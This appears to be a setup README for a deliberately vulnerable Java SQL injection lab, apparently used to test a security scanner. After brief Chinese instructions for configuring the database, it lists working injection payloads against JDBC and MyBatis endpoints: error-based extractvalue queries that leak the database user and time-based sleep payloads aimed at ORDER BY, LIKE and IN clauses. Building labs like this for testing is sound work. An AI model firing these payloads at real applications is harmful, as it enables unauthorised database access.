修改src/main/resources/application-dev.yml中的数据库信息
将表导入数据库src/main/resources/user.sql
src/main/java/com/uzju/dongtai_sql_inject_lab/controller/JDBCInject.java
/jdbc/statement_and_inject?id=1'+and+extractvalue(1,concat(0x7e,user()))--+
/jdbc/preparestatement_and_inject?id=1'+and+extractvalue(1,concat(0x7e,user()))--+
/jdbc/preparestatement_orderby_inject?id=1&orderby=id+and+extractvalue(1,concat(0x7e,user()))
/jdbc/preparestatement_like_inject?id=1%25'+and+extractvalue(1,concat(0x7e,user()))--+
/jdbc/preparestatement_in_inject?id=1)+and+extractvalue(1,concat(0x7e,user()))--+
/mybatis/getUser_inject?id=1+and+sleep(3)
/mybatis/getUser_orderby_inject?id=1&getparse=id+and+if(1=1,1,(SELECT(1)FROM(SELECT(SLEEP(2)))test))
/mybatis/getUser_like_inject?id=1&username=admin'+and+sleep(3)--+
/mybatis/getUser_in_inject?id=1)+and+sleep(3)--+